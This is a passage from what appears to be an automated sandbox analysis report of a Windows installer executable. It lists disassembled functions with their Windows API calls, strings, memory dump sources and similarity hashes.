                                                                                    • ShowWindow.USER32(?,00000005,00000000,0065C528), ref: 0065C562
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$HandleLongModule$ErrorMessageModeSendShowText
                                                                                    • String ID: Setup
                                                                                    • API String ID: 1533765661-3839654196
                                                                                    • Opcode ID: f8c58ef73216a5b498c7f1e6a965958284e2f0dd262b70c0fb50f6e5d3e4fcef
                                                                                    • Instruction ID: 1b4fd68c5f12b7e95b75c71ee5b84b9948103f9578c114e64c2b51bfeab17fc8
                                                                                    • Opcode Fuzzy Hash: f8c58ef73216a5b498c7f1e6a965958284e2f0dd262b70c0fb50f6e5d3e4fcef
                                                                                    • Instruction Fuzzy Hash: 63218134204B02AFC300EF69DC96D567BEAFB4B360B1155B5F900CB7B1DAB4A850CB64
                                                                                    Function 00619ABC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000004FF,00000000,00619B3D), ref: 00619AEE
                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00619B11
                                                                                    • CloseHandle.KERNEL32(?,00619B44,000000FF,000004FF,00000000,00619B3D), ref: 00619B37
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                    • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                    • API String ID: 2573145106-3235461205
                                                                                    • Opcode ID: 242899fcc0be58cbc3ab360f2b663c78cae9d5b9790535ea214d61b29f3b34d3
                                                                                    • Instruction ID: 17f76d570b79bce70c84d933d727bccac0e9e9e67c25deff2b623aab18eb49ef
                                                                                    • Opcode Fuzzy Hash: 242899fcc0be58cbc3ab360f2b663c78cae9d5b9790535ea214d61b29f3b34d3
                                                                                    • Instruction Fuzzy Hash: 0C01F730708209AFDB10DBACDC62DEE77EAEB85724F140570F510C73D0DA38AD809625
                                                                                    Function 00405634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 0040566B
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 00405671
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 00405680
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 00405691
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory
                                                                                    • String ID: :
                                                                                    • API String ID: 1611563598-336475711
                                                                                    • Opcode ID: cfe5adf384c6779782b3d8b12f3b8a0230f146eb02df9a283bc8ffd2dbd2e46c
                                                                                    • Instruction ID: dce63c72c99c25e19be56c3ef1376a95404931ccd87f5083cd5fd4336c869f13
                                                                                    • Opcode Fuzzy Hash: cfe5adf384c6779782b3d8b12f3b8a0230f146eb02df9a283bc8ffd2dbd2e46c
                                                                                    • Instruction Fuzzy Hash: 94F0F061140B447AD320EB65C852AEB72DCDF44305F40883F7AC8D73D2E67E8948976A
                                                                                    Function 005865CC Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cf7bdf9da67ecc928336aab066482e6213c2e24160aca79d3e9667660882f776
                                                                                    • Instruction ID: 7ced4f6ac72d4b624eb87d8c68b941b316f9879e7a3a6f593d5052ea882bc33a
                                                                                    • Opcode Fuzzy Hash: cf7bdf9da67ecc928336aab066482e6213c2e24160aca79d3e9667660882f776
                                                                                    • Instruction Fuzzy Hash: D411A230A0029A9ADB307B3A595AB9A3F88BF81758F040429BD01FF246EE74DC5587A0
                                                                                    Function 00420F94 Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DeleteFileW.KERNEL32(00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00420FA4
                                                                                    • GetLastError.KERNEL32(00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00420FB3
                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000), ref: 00420FBB
                                                                                    • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000), ref: 00420FD6
                                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000), ref: 00420FE4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                                                    • String ID:
                                                                                    • API String ID: 2814369299-0
                                                                                    • Opcode ID: abb7752b3b6d9ecc2b71773dca15c327e56584de84a87eac260585061ca53039
                                                                                    • Instruction ID: 6ebe3b4cf45532d28852752088064c3a0fe5d7edeb4f0602fc5494761cc484af
                                                                                    • Opcode Fuzzy Hash: abb7752b3b6d9ecc2b71773dca15c327e56584de84a87eac260585061ca53039
                                                                                    • Instruction Fuzzy Hash: 43F0A7613843211D9630397E29C9EFF158C894276DB55073FFA50D22A3C59D5D4A816E
                                                                                    Function 005A0B08 Relevance: 7.5, APIs: 5, Instructions: 39threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • UnhookWindowsHookEx.USER32 ref: 005A0B1A
                                                                                    • SetEvent.KERNEL32(00000000), ref: 005A0B46
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 005A0B4B
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF,00000000), ref: 005A0B74
                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 005A0B81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2132507429-0
                                                                                    • Opcode ID: cbfe83d1defdd885ccca9dee31e8f3165b3cbbe1b1857a3439133bc7b73916d0
                                                                                    • Instruction ID: eeeb615204661b1aca082b56b3788136df217e3b650a30bde2679d9a32e7b538
                                                                                    • Opcode Fuzzy Hash: cbfe83d1defdd885ccca9dee31e8f3165b3cbbe1b1857a3439133bc7b73916d0
                                                                                    • Instruction Fuzzy Hash: 2701AD70228204AFCB00EF68DE06B9D3BE8FB05314F005A2AF654C71E4E7B49880CB66
                                                                                    Function 004702D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(0046E670,00000004,0046E66C,00000000,004703CD,?,0046E66C,00000000), ref: 0047036F
                                                                                      • Part of subcall function 004085D8: CreateThread.KERNEL32 ref: 00408632
                                                                                    • GetCurrentThread.KERNEL32 ref: 004703A7
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004703AF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$Current$CreateErrorLast
                                                                                    • String ID: 9D
                                                                                    • API String ID: 3539746228-2600770735
                                                                                    • Opcode ID: 20054409b78bed9dc7d827a3f23650664e97c0f182fc3617d8a6bc92920a28c5
                                                                                    • Instruction ID: f9857796ad14231e6e04606ef7c0ce10faa70948f457118b7ae5954610b77c36
                                                                                    • Opcode Fuzzy Hash: 20054409b78bed9dc7d827a3f23650664e97c0f182fc3617d8a6bc92920a28c5
                                                                                    • Instruction Fuzzy Hash: 9B31E070A05744EFD720DB76C8417EBBBE4AF09304F40C87EE899D7691DA78A844C769
                                                                                    Function 006508D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(00000000,0065C528,00000000,006509D2,?,?,0066978C,?,00000000,00000000,?,00650E02,00000000,00650E0C,?,00000000), ref: 00650944
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,0065C528,00000000,006509D2,?,?,0066978C,?,00000000,00000000,?,00650E02,00000000,00650E0C), ref: 0065096D
                                                                                    • MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,0065C528,00000000,006509D2,?,?,0066978C,?,00000000,00000000,?,00650E02,00000000), ref: 00650986
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Attributes$Move
                                                                                    • String ID: isRS-%.3u.tmp
                                                                                    • API String ID: 3839737484-3657609586
                                                                                    • Opcode ID: d74af280762a3c12f4f76a8dd6f825dd2da387fd0f27d3d277c556f93e4830d1
                                                                                    • Instruction ID: fd64645e21a18fecabc0b8dc279039ee35b9e16079179385e1984e8b922befa7
                                                                                    • Opcode Fuzzy Hash: d74af280762a3c12f4f76a8dd6f825dd2da387fd0f27d3d277c556f93e4830d1
                                                                                    • Instruction Fuzzy Hash: 8131C571E002099FEB00EBA9C9829DEB7F9AF44314F50457EF814F32D2CB389E458A55
                                                                                    Function 00407A7E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00407AEA
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00007A80), ref: 00407B27
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID: (lB$X7@
                                                                                    • API String ID: 3192549508-2535443016
                                                                                    • Opcode ID: 4b9580ef83ab60be5e1144ed772b18e1cf81e1b814eace585b2863a8bb85044a
                                                                                    • Instruction ID: b43bc4563ed2c5b4d44d4e312f14e91904ee98f66dbd2fd5bccfcfafe145c76a
                                                                                    • Opcode Fuzzy Hash: 4b9580ef83ab60be5e1144ed772b18e1cf81e1b814eace585b2863a8bb85044a
                                                                                    • Instruction Fuzzy Hash: B53141B0A08340AFE720EB15C985F27B7F9EB84718F1585AEE504972D1C778FC85C666
                                                                                    Function 00407FBE Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • UnhandledExceptionFilter.KERNEL32(00000006), ref: 00407FDF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID: (lB$0mB$X7@
                                                                                    • API String ID: 3192549508-2219141271
                                                                                    • Opcode ID: fe6d2a0f9b9a2abee4062f10a0be2c3e91457e6813b961ba9c6a74811b2b6cc5
                                                                                    • Instruction ID: 81debfe1353670a627177ee0635cc1a720af15295a81fe09638863fdd9ccb86d
                                                                                    • Opcode Fuzzy Hash: fe6d2a0f9b9a2abee4062f10a0be2c3e91457e6813b961ba9c6a74811b2b6cc5
                                                                                    • Instruction Fuzzy Hash: DE2162717082069BD724DF29C980B2B77A1AB84704F15853EE444AB3D5CB3CED459B6A
                                                                                    Function 0064E360 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateProcessW.KERNEL32 ref: 0064E3CD
                                                                                    • CloseHandle.KERNEL32(xd,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,0064E434,?,0064E424,00000000), ref: 0064E3EA
                                                                                      • Part of subcall function 0064E2B8: GetLastError.KERNEL32(00000000,0064E353,?,?,?), ref: 0064E2DB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
